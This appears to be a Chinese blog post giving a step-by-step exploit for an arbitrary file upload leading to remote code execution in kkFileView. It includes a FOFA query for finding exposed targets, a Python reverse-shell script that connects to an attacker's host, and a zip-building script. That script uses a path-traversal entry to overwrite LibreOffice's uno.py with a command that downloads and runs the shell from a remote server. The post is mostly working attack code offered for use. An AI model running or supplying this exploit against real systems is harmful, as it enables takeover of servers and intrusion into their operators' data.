FOFA:
app=”kkFileView”
步骤
保存ft.py,vpn起web服务
import socket
import subprocess
import os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("ip",port))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])![图片[1]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站](https://oss.bdziyi.com/vip/2024/04/20240419213209863.png?imageView2/0/format/webp/q/75)
制作ft.zip,上传并预览
| import zipfile if __name__ == “__main__”: try: binary1 = b’test123′ binary2 = b’import os\r\nos.system(\’wget http://vps:30285/ft.py && python3 ft.py\’)’ zipFile = zipfile.ZipFile(“ft.zip”, “a”, zipfile.ZIP_DEFLATED) info = zipfile.ZipInfo(“ft.zip”) zipFile.writestr(“test”, binary1) zipFile.writestr(“../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py”, binary2) zipFile.close() except IOError as e: raise e |
![图片[2]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站](https://oss.bdziyi.com/vip/2024/04/20240419213212243.png?imageView2/0/format/webp/q/75)
![图片[3]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站](https://oss.bdziyi.com/vip/2024/04/20240419213215186.png?imageView2/0/format/webp/q/75)
![图片[4]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站](https://oss.bdziyi.com/vip/2024/04/20240419213218652.png?imageView2/0/format/webp/q/75)
然后随便创一个.odt文件,上传并浏览。
![图片[5]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站](https://oss.bdziyi.com/vip/2024/04/20240419213222993.png?imageView2/0/format/webp/q/75)
![图片[6]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站](https://oss.bdziyi.com/vip/2024/04/20240419213225143.png?imageView2/0/format/webp/q/75)
![图片[7]-kkFileView存在任意文件上传致远程代码执行漏洞-棉花糖会员站](https://oss.bdziyi.com/vip/2024/04/20240419213228866.png?imageView2/0/format/webp/q/75)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容